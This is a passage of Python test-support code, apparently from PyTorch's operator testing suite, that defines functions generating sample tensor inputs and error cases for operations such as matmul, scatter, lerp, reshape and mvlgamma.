""" inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=with_dtype, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_cumops(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked cumsum and cumprod. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): if type(mask) != torch.Tensor: continue sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) if 'keepdim' in sample_input_kwargs: sample_input_kwargs.pop('keepdim') # dimension is required if sample_input_args: dim = sample_input.args[0] else: if 'dim' not in sample_input_kwargs: continue dim = sample_input_kwargs.pop('dim') sample_input_args = (dim,) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_normalize(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked normalize. """ inputs: List[SampleInput] = [] for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_logit(op_info, device, dtype, requires_grad, **kwargs): low, high = op_info.domain # Note: Operator is very sensitive at points near the # start and end of domain and leads to NaN for float16 # if domain_eps is 1e-5. domain_eps = op_info._domain_eps if dtype != torch.float16 else 3e-2 low = low + domain_eps high = high - domain_eps samples = ( SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), ) return samples def sample_inputs_isin(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # isin has two paths based on the size of elements and test_elements. 
# if elements.numel() < 10 * pow(test_elements.numel(), 0.145): yield SampleInput(make_arg((L,)), args=(make_arg((S,)),)) # else: yield SampleInput(make_arg((S,)), args=(make_arg((L,)),)) def sample_inputs_masked_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(torch.randn((S,), device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(bernoulli_scalar().to(device), make_arg((S, S)))) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S))), broadcasts_input=True) def sample_inputs_masked_fill(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, 10)) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg(())), broadcasts_input=True) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, 10), broadcasts_input=True) def sample_inputs_masked_select(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn(M, M, device=device) > 0,)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M,), device=device) > 0,)), SampleInput(make_tensor((M,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((M, 1, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), ) return samples def sample_inputs_matrix_exp(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, requires_grad=requires_grad)), ) return samples def sample_inputs_matmul(op_info, device, dtype, requires_grad, **kwargs): test_cases = (((L,), (L,)), ((S, M), (M,)), ((M,), (M, S)), ((S, M), (M, S)), ((S, 0), (0, M)), ((S, S, M), (M,)), ((S, S, M), (M, S)), ((S, S, 0), (0, S)), ((M,), (S, M, S)), ((S, M), (S, M, S)), ((0, 0), (S, 0, 0)), ((S, S, M, M), (S, S, M, S)), ((S, S, M, M), (M,)), 
((M,), (S, S, M, S))) sample_inputs = [] for lhs_shape, rhs_shape in test_cases: lhs = make_tensor(lhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) rhs = make_tensor(rhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if op_info.name == 'matmul': sample_inputs.append(SampleInput(lhs, args=(rhs,))) elif op_info.name == '__rmatmul__': sample_inputs.append(SampleInput(rhs, args=(lhs,))) else: raise RuntimeError("`op_info.name` must be 'matmul' or '__rmatmul__'") return tuple(sample_inputs) def sample_inputs_meshgrid(op_info: OpInfo, device: torch.device, dtype: torch.dtype, requires_grad: bool, *, variant: str, **kwargs) -> List[SampleInput]: if variant == 'variadic': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors[0], tuple(tensors[1:]) elif variant == 'list': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors, () else: raise ValueError( 'Unsupported variant, must be one of {"variadic", "list"}. ' f'Got "{variant}".') SCALAR = torch.Size([]) VECTOR = torch.Size([3]) test_cases: List[List[torch.Size]] = [ [SCALAR], [VECTOR], [VECTOR, SCALAR], [VECTOR, SCALAR, VECTOR], [VECTOR, SCALAR, VECTOR, SCALAR], ] sample_inputs = [] for shapes, indexing in itertools.product(test_cases, {'xy', 'ij'}): input, args = make_inputs( [make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes]) sample_inputs.append(SampleInput(input=input, args=args, kwargs=dict(indexing=indexing))) return sample_inputs def sample_inputs_polygamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) for shape, n in product(tensor_shapes, ns): yield SampleInput(make_arg(shape), args=(n,)) def sample_inputs_mvlgamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) # Since the accepted lower bound for input # to mvlgamma depends on `p` argument, # the following function computes the lower bound # which we pass to `make_tensor`. def compute_min_val(p): return (p - 1.) / 2 for shape, n in product(tensor_shapes, ns): min_val = compute_min_val(n) if not dtype.is_floating_point: # Round-up minimum value for integral dtypes min_val += 1 else: min_val += 2 * torch.finfo(dtype).eps yield SampleInput(make_arg(shape, low=min_val), args=(n,)) # Since `mvlgamma` has multiple entries, # there are multiple common skips for the additional # entries. Following function is a helper to that end. def skips_mvlgamma(skip_redundant=False): skips = ( # outside domain values are hard error for mvlgamma op. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_float_domains'), ) if skip_redundant: # Redundant tests skips = skips + ( # type: ignore[assignment] DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), ) return skips # To test reference numerics against multiple values of argument `p`, # we make multiple OpInfo entries with each entry corresponding to different value of p. # We run the op tests from test_ops.py only for `p=1` to avoid redundancy in testing. 
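# (Illustrative: the entries might be variants for p = 1, 3, 5, each with its
# own domain lower bound (p - 1) / 2 from compute_min_val above, i.e. 0.0, 1.0
# and 2.0 respectively.)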
# Class `MvlGammaInfo` already contains the basic information related to the operator;
# it only takes arguments like `domain`, `skips` and `sample_kwargs`, which
# differ between the entries.
class MvlGammaInfo(UnaryUfuncInfo):
    def __init__(self, variant_test_name, domain, skips, sample_kwargs):
        super(MvlGammaInfo, self).__init__(
            'mvlgamma',
            ref=reference_mvlgamma if TEST_SCIPY else _NOTHING,
            aliases=('special.multigammaln',),
            variant_test_name=variant_test_name,
            domain=domain,
            decorators=(precisionOverride({torch.float16: 5e-2}),),
            dtypes=all_types_and(torch.bfloat16),
            dtypesIfCUDA=all_types_and(torch.half),
            sample_inputs_func=sample_inputs_mvlgamma,
            supports_forward_ad=True,
            supports_fwgrad_bwgrad=True,
            skips=skips,
            sample_kwargs=sample_kwargs)


def sample_inputs_entr(op_info, device, dtype, requires_grad, **kwargs):
    low, _ = op_info.domain

    if requires_grad:
        low = 0 + op_info._domain_eps

    return (SampleInput(make_tensor((L,), dtype=dtype, device=device,
                                    low=low,
                                    requires_grad=requires_grad)),
            SampleInput(make_tensor((), dtype=dtype, device=device,
                                    low=low,
                                    requires_grad=requires_grad)))


# TODO: Consolidate `i0e` with sample_inputs_unary when `make_tensor`
#       supports an `exclude` argument.
#       For more context: https://github.com/pytorch/pytorch/pull/56352#discussion_r633277617
def sample_inputs_i0_i1(op_info, device, dtype, requires_grad, **kwargs):

    samples = (SampleInput(make_tensor((S,), dtype=dtype, device=device,
                                       requires_grad=requires_grad)),
               SampleInput(make_tensor((), dtype=dtype, device=device,
                                       requires_grad=requires_grad)))

    if requires_grad and op_info.op == torch.special.i0e:
        # NOTE: `i0e`'s first-order gradient is not continuous
        # at `0`, hence we don't test `i0e` with any input being `0`.
        # TODO: Remove this when `make_tensor` supports excluding `0`.
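        # (For reference, the replacement value used below is machine epsilon,
        # e.g. torch.finfo(torch.float32).eps == 1.1920928955078125e-07.)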
for sample in samples: t = sample.input t[t == 0] = torch.finfo(dtype).eps # type: ignore[index] elif requires_grad and op_info.op != torch.special.i0e: # Special Case for gradient # Sample with `0` in the input t = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) t[0] = 0 samples += (SampleInput(t),) # type: ignore[assignment] return samples def sample_inputs_cumulative_ops(op_info, device, dtype, requires_grad, supports_dtype_kwargs=True, **kwargs): def _make_tensor_helper(shape, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples = [ SampleInput(_make_tensor_helper((S, S, S)), args=(0,)), SampleInput(_make_tensor_helper((S, S, S)), args=(1,)), SampleInput(_make_tensor_helper(()), args=(0,)), ] if supports_dtype_kwargs: # NOTE: if `dtype` is not same as input, then inplace variants fail with # `provided dtype must match the dtype of self tensor in cumsum` samples.append(SampleInput(_make_tensor_helper((S, S, S)), args=(1,), kwargs={'dtype': dtype})) return samples def sample_inputs_unfold(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((), (0, 1, 1)), ((S, S, S, S), (0, 3, 1)), ((S, S, S, S), (1, 3, 1)), ((S, S, S, S), (2, 3, 1)), ((S, S, S, S), (3, 3, 1)), ((S, S, S, S), (0, 3, 2)), ((S, S, S, S), (1, 3, 2)), ((S, S, S, S), (2, 3, 2)), ((S, S, S, S), (3, 3, 2)), ((S, S, S, S), (0, 4, 1)), ((S, S, S, S), (1, 4, 1)), ((S, S, S, S), (2, 4, 1)), ((S, S, S, S), (3, 4, 1)), ((M,), (0, 3, 1)), ((M,), (0, 3, 2)), ((M,), (0, 3, 3)), ((1000,), (0, 3, 11)), ((1000,), (0, 2, 27)), ((10, 10), (0, 1, 2)), ((10, 10), (1, 2, 3)), ((10, 10), (1, 2, 2)), ((S, S, S), (2, 3, 2)), ) sample_inputs = [] for shape, arguments in test_cases: sample_inputs += [SampleInput(make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=arguments)] return sample_inputs def sample_inputs_split(op_info, device, dtype, requires_grad, *, list_args=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if list_args: cases = ( ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], 2),), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], -2),) ) else: cases = ( # type: ignore[assignment] ((S, S, S), (2,)), ((S, S, S), (S, 1)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_split_with_sizes(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = (((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 3), S - int(S / 3), 0],)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], 2)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], -2)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_msort(op_info, device, dtype, requires_grad, **kwargs): def apply_grad(t): if dtype in floating_types_and(torch.float16, torch.bfloat16): t.requires_grad_(requires_grad) def large_1d_unique(dtype, device): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype) apply_grad(res) return res samples = [] # Test case for large tensor. 
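    # (large_1d_unique builds a randperm of 0 .. L**3 - 1, i.e. 8000 distinct
    # values when L == 20, so the sort order is essentially unambiguous;
    # exact uniqueness after the .to(dtype) cast depends on the dtype's precision.)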
largesample = SampleInput(large_1d_unique(dtype, device)) sample = SampleInput(make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) return [largesample, sample] def sample_inputs_lerp(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = ( # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4)), # broadcast rhs with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S,)), make_arg((S, S)))), # broadcast rhs and weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, 1)), make_arg((S,)))), # broadcast lhs SampleInput(make_arg((S,)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # scalar broadcast_lhs SampleInput(make_arg(()), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # tensor broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), make_arg((S, 1))), broadcasts_input=True), # no broadcast with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, S)), make_arg((S, S)))), # broadcast lhs with weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor variant SampleInput(make_arg((S, S)), args=(make_arg((S, S, S)), make_arg((S,))), broadcasts_input=True), ) if dtype.is_complex: samples = samples + ( # type: ignore[assignment] # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 1.2 + 0.1j)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 5.4 + 9j)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4j)), SampleInput(make_arg(()), args=(make_arg(()), 6.1 + 0.004j)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg(()), 1 + 2j)), ) return samples def sample_inputs_tensordot(self, device, dtype, requires_grad, **kwargs): cases = ( ((2, 2, 2), (2, 2, 2), (2)), ((2, 2, 1), (2, 1, 2), ([0, 1], [2, 0])), ) samples = [] for first_shape, second_shape, dims in cases: samples.append(SampleInput(make_tensor(first_shape, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(second_shape, dtype=dtype, device=device, requires_grad=requires_grad),), kwargs=dict(dims=dims,))) return tuple(samples) def sample_inputs_kron(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, S), (M, L)), ) sample_inputs = [] for input_shape, other_shape in test_cases: input = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) other = make_tensor(other_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample = SampleInput(input, args=(other,)) sample_inputs.append(sample) return tuple(sample_inputs) def sample_inputs_inner(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( 
make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), ) ), SampleInput( make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ) ), ) def sample_inputs_scatter(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), (_tensor(()), (0, zero.clone().detach(), 2.5)), ) samples = [] for tensor, args in test_cases: samples.append(SampleInput(tensor, args=args)) if not requires_grad: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'add'} )) if dtype.is_floating_point: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'multiply'} )) return samples def sample_inputs_scatter_add(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), ) return [SampleInput(tensor, args=args) for tensor, args in test_cases] def sample_inputs_scatter_reduce(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( ((M, S), 0, _gather((S, S), 1, M), (S, S)), ((M, S), 1, _gather((S, S), 0, S), (S, S)), ((M, S), -1, _gather((S, S), 0, S), (S, S)), ((M, S), 0, _gather((M, S // 2), 1, M), (M, S // 2)), ((M, S), 1, _gather((M, S // 2), 0, S), (M, S // 2)), ((M, S), -1, _gather((M, S // 2), 0, S), (M, S // 2)), ((), 0, zero.clone().detach(), ()), ) reduce = op_info.variant_test_name for args, include_self in product(test_cases, [True, False]): inp_shape, dim, index, src_shape = args yield SampleInput(_tensor(inp_shape), args=(dim, index, 
_tensor(src_shape), reduce), kwargs={'include_self': include_self}) # Sample inputs to test edge cases for backward # Check that gradients are propagated correctly for prod when zeros in self/src are reduced if requires_grad and reduce == 'prod': # This sample tests gradients for the following cases # (a) 1 zero reduced (from src (self[0, 1], self[1, 1]), from self (self[0, 0], self[2, 0])) # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0]) # (c) no zeros reduced (self([2, 1])) # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py # test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad input = torch.tensor([[0, 13], [0, 17], [0, 19]], dtype=dtype, device=device, requires_grad=requires_grad) src = torch.tensor([[0, 1, 2, 3], [0, 4, 0, 1], [2, 3, 5, 6]], dtype=dtype, device=device, requires_grad=requires_grad) idx = torch.tensor([[1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 0, 1]], dtype=torch.long, device=device) yield SampleInput(input, args=(1, idx, src, reduce), kwargs={'include_self': True}) def sample_inputs_ravel(op_info, device, dtype, requires_grad, **kwargs): samples = (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)),) return samples def sample_inputs_tril_triu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((M, M), ()), ((M, M), (2,),), ((S, M, M), ()), ((S, M, M), (2,)), ((3, 3, S, S), ()),) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_clone(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, M, S))) yield SampleInput(make_arg(())) def reference_inputs_clone(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_clone(op, device, dtype, requires_grad, **kwargs) shapes = ( (3, 5, 6), (1, 1, 3, 5, 6), (1, 1, 3, 5, 6, 1, 1), (1, 0, 3, 5, 0, 2), (1, 0, 3, 5, 0, 0, 1, 1, 2), (), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) for shape, strides, offset in strided_cases: yield SampleInput(make_arg(500,).as_strided(shape, strides, offset)) def sample_inputs_contiguous(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, S))) def sample_inputs_sum_to_size(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # list of tuples (shape, shape) defining the shapes of the input and output tensors sample_shapes = [ ((), ()), ((S), (1)), ((S, S), (1, 1)), ((S, S), (1, S)), ((S, S), (S, S)), ((S, S, S), (S, 1, S)), ] samples = [] for input_shape, output_shape in sample_shapes: input_t = make_arg(input_shape) 
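        # (sum_to_size reduces along broadcast dimensions; illustratively, a
        # (S, S) input summed to size (1, S) collapses dim 0, the inverse of
        # broadcasting (1, S) up to (S, S).)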
samples.append(SampleInput(input_t, args=(output_shape,))) return samples def sample_inputs_resize_ops(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1, 1)), ) for shape, args_or_shape in cases: # Update `args` based on operator if op_info.name == 'resize_': # resize_ takes shape/tuple of ints, args = (args_or_shape, ) elif op_info.name == 'resize_as_': # resize_as_ takes another tensor args = (make_arg(shape, requires_grad=False), ) # type:ignore[assignment] else: raise ValueError("sample_inputs_resize_ops is being used with incorrect operator") yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=args)) def sample_inputs_view_reshape(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = ( ((S, S, S), (S * S, S)), ((S * S, S), (S, S, S)), ((S * S, S), (S, -1, S)), ((S * S * 2, S), (S, -1)), ((S,), (S,)), ((), ()), ((), (1,)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) if kwargs.get("transpose_samples", False) and len(shape) >= 2: transposed = make_arg(shape).transpose(0, 1).detach().requires_grad_(requires_grad) yield SampleInput(transposed, args=(args,)) def reference_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs) cases = ( ((125,), (25, 5)), ((25, 25), (1, 5, 5, 1, 5, 1, 5, 1)), ((16, 32), (2, 4, 1, 4, 4, 1, 4)), ((16, 12), (12, 16)), ((1, 16, 12), (12, 16)), ((1, 5, 1, 5), (25, 1)), ((2, 4, 2), (4, 4)), ((1, 4), (1, 1, 2, 1, 2)), ((3, 5, 7), (7, 5, 3)), ((1,), ()), ((5, 0, 2, 3), (5, 0, 2, 3)), ((2, 1, 0, 3, 1), (5, 0)), ((1,), ()), ((4, 5, 6), (4, 5, 6, 1, 1, 1)), ((), (1, 1, 1, 1)), ) irreversible_cases = ( ((), (-1,)), ((4, 7, 9, 1, 1), (1, 4, 3, -1, 1)), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for a, b in cases: yield SampleInput(make_arg(a), args=(b,)) yield SampleInput(make_arg(b), args=(a,)) if kwargs.get("transpose_samples", False): yield SampleInput(make_arg(a, noncontiguous=True).transpose(0, -1), args=(b,)) else: yield SampleInput(make_arg(a, noncontiguous=True), args=(b,)) for a, b in irreversible_cases: yield SampleInput(make_arg(a), args=(b,)) def error_inputs_reshape(op, device, **kwargs): cases = ( # Reshape to different numel ((2,), ()), ((1, 3, 0), ()), ((4, 3), (4, 2)), ((1, 3, 5), (5, 2, 2)), # No valid inference ((1, 3, 5), (5, -1, 2)), # Two inferred shapes ((1, 3, 5), (5, -1, -1)), ((1), (0, -1)), ((0, 5), (0, -1)), ) make_arg = partial(make_tensor, dtype=torch.float32, device=device, requires_grad=False) for a, b in cases: yield ErrorInput(SampleInput(make_arg(a), args=(b,)), error_type=Exception, error_regex="") def sample_inputs_view_as_reshape_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1)), ) for case in cases: shape, shape_other = case inp = make_arg(shape, requires_grad=requires_grad) yield(SampleInput(inp, args=(make_arg(shape_other, requires_grad=False),))) if op_info.name != "view_as" and len(shape) >= 2: yield(SampleInput( inp.clone().transpose(0, 1).requires_grad_(requires_grad), args=(make_arg(shape_other, requires_grad=False),))) def sample_inputs_atleast1d2d3d(op_info, device, dtype, requires_grad, **kwargs): input_list = [] 
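    # (atleast_1d/2d/3d accept either a single tensor or several; passing the
    # collected list as one input below is assumed to exercise the sequence
    # handling, where a tuple of promoted tensors is returned.)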
